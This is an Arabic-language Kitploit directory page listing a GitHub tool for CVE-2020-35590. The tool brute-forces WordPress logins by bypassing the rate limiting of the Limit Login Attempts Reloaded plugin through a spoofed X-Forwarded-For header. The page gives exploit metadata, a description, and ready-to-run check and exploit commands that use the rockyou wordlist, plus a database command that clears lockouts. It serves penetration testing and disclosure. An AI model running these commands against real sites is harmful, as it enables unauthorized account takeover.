Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-35590 — أداة هجوم القوة الغاشمة لإضافة ووردبريس Limit Login Attempts Reloaded >=2.13.0 - تجاوز حد تسجيل الدخول (CVE-2020-35590) | Kitploit
أدوات/GitHubGitHub/n4nj0/cve-2020-35590
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقة
GitHubn4nj0/cve-2020-35590

CVE-2020-35590

أداة هجوم القوة الغاشمة لإضافة ووردبريس Limit Login Attempts Reloaded >=2.13.0 - تجاوز حد تسجيل الدخول (CVE-2020-35590)

عرض المستودع
84منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

معلومات الاستغلال

عنوان الاستغلال: WordPress Plugin Limit Login Attempts Reloaded 2.13.0 - تجاوز حد تسجيل الدخول
CVE: CVE-2020-35590
التاريخ: 2020-06-09
مؤلف الاستغلال: N4nj0
رابط البرنامج: https://wordpress.org/plugins/limit-login-attempts-reloaded/
الإصدار: 2.13.0
تم اختباره على: WordPress 5.4.1, 5.4.2
نشرة الثغرة: https://n4nj0.github.io/advisories/wordpress-plugin-limit-login-attempts-reloaded/

يهدف المكوّن الإضافي المتأثر في ووردبريس إلى أن يكون آلية حماية من هجمات القوة الغاشمة (Bruteforce)، وهو مثبّت حاليًا في أكثر من مليون تثبيت نشط.
لقد اكتشفت تجاوزًا لتحديد المعدل (Rate Limiting) عند استخدام إعدادات غير افتراضية، مما يُبطل الغرض من المكوّن الإضافي فعليًا.

الاستخدام

الفحص

./wp-brute.py -c -u http://wordpress -H X-Forwarded-For -l admin -P /usr/share/wordlists/rockyou.txt
./wp-brute.py --check --url http://wordpress --header X-Forwarded-For --login admin --passwordlist /usr/share/wordlists/rockyou.txt --quiet

الاستغلال

./wp-brute.py -e -u http://wordpress -H X-Forwarded-For -l admin -P /usr/share/wordlists/rockyou.txt -q
./wp-brute.py --exploit --url http://wordpress --header X-Forwarded-For --login admin --passwordlist /usr/share/wordlists/rockyou.txt --quiet

فك قفل المستخدم يدويًا

mysql -uroot -ppassword wordpress -e "UPDATE wp_options SET option_value = '' WHERE option_name = 'limit_login_lockouts' LIMIT 1;"

تنزيل الأداة